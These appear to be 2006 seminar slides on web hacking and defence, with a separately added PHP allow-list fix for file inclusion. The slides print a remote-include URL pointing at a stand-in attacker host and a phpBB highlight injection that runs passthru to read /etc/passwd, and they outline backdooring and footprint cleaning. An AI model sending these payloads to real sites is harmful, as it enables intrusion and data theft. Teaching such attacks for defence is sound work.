ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
Ahmad Muammar W. K.
http://www.google.com/search?q=y3dips
theory
  how 2 start, lookin for foods, we "drive in", what we choose, web hacking
survive
  user, developer, administrator
simulation
  from 33 to 0
discussion
do we know hacking ?
hacker != cracker
hacking is not defacing
f.a.q 4 newbies version 1.0 at (http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt)
footprinting , scanning , enumeration
need to find a low security machine
lazy admin
un-patch
default are fault
more n more ….. pe-de-ka-te (getting close) with target
from open port
  80 are open, 22 are open, 25 are open, …
operating system vulnerability
  windows xp sp 1, redhat 8.0
  remote ?
application bug
authentication attack (bruteforcing, password guessing)
passive action (sniffing)
social engineering
well known services are open ?
ssh, smtp, https, pop3 …. also open
web server are open
should we do web hacking
hacking over http
hacking against web application
web browser attack
using http rules (method)
on the top of the layer
most of server in i-net running web server
how about Firewall ?
  it’s a legal request
  un-filtered ?
dynamically changed
run multiple application (voting, guestbook, e.t.c)
more friendly >< more easier
On The Top of Security Level Layer
web browser ? (opera, firefox)
command line interface (msdos, bash)
programming language
reference : advisories
[diagram: web application components]
Components: User, Firewall, Web Server, Web application, Database Server
http request (clear text / ssl)
Http reply (HTML, Javascript, VBscript)
Web Server: Apache, IIS, Tomcat, Netscape
Plugins: Perl, PHP, JSP, E.t.c
Database Server: MsSQL, Postgre, Mysql, Oracle
Web Hacking
Client side attack (xss, cookies stealing)
Information Disclosure
OS commanding (SQL, SSI, Ldap, Xpath )
Brute Force
Path traversal
Denial Of Service
Remote command execution (php)
Source: http://www.webappsec.org
Etc
a type of attack carried out by including another web page into a site/web application.
index.php ( bug in $file variable)
http://victim.com/index.php?file=readme.txt
http://victim.com/index.php?file=http://echo.or.id
http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
http://echo.or.id
victim
Real site
<? phpinfo();?>
Change url "http://echo.or.id" > http://attacker.xxx/in.txt
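The fix for the index.php?file= pattern above, as an added example (not code from the original slides or from the advisory): the vulnerable include next to an allow-list version. The PAGES map, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example, not from the original slides.
// Vulnerable pattern described on the slide: the request parameter goes
// straight into include(), so a local path or a URL is accepted as-is.
//
//     include($_GET['file']);
//
// Hardened form: the parameter is only a key into a fixed allow-list, so
// the request never contributes any part of the path that gets included.

// Hypothetical page map; keys are the only values allowed in ?file=
const PAGES = [
    'readme.txt' => 'readme.txt',
    'news'       => 'news.php',
    'about'      => 'about.php',
];

/**
 * Map the raw ?file= value to a file under $baseDir, or null if it is not
 * an allow-listed key. Arrays, URLs, "../" sequences and NUL bytes all
 * fail the lookup because they are not keys of PAGES.
 */
function resolve_page($raw, string $baseDir): ?string
{
    if (!is_string($raw) || !array_key_exists($raw, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$raw];
}

// Constructed sample inputs, including the two requests from the slide.
$samples = ['readme.txt', 'news', 'http://echo.or.id',
            '../../etc/passwd', ['readme.txt']];

foreach ($samples as $raw) {
    $path = resolve_page($raw, __DIR__ . '/pages');
    printf("%-22s => %s\n",
           is_string($raw) ? $raw : gettype($raw),
           $path === null ? 'rejected (404)' : 'include ' . $path);
}

// In index.php the call site would then be:
//   $path = resolve_page($_GET['file'] ?? 'readme.txt', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) blocks the URL form of the request as a second layer, but it does not stop local-path inclusion, so the allow-list is still needed.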
a type of attack carried out by remotely including programming-language tags, causing the "vulnerable" web application to execute the "request" that was sent.
viewtopic.php ( bug at highlight variable)
http://victim.com/viewtopic.php?t=48
http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
defacing
private data stolen
system compromise
zombie ( ddos agent, botnet agent )
e.t.c
The act of altering/damaging the appearance of a website, whether the main page (index) or another page still under the same URL as that website (another folder; another file)
always update ur system
use a firewall, antivirus, good backup facility, etc
using good password/pass phrase
be careful of social engineering
carefully in using public facility ( cyber cafe )
secure login/Secure connection (https ; ssh)
update an information
secure programming
input validation
encryption in authentication
set error log to off
what u need? and what u can?
update an information
policy (strict restriction)
optimal setting on server
function restriction
  php (passthru, system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver) ; mysql (system).
update the system (security patch/update)
update an information
pe-de-ka-te (getting close)
web hacking process
  php injection, enumeration
escalating privilege
  ptrace-kmod
backdooring
  bindtty, connect-back
cleaning our footprints
  remove.c
http://kaos.echo.or.id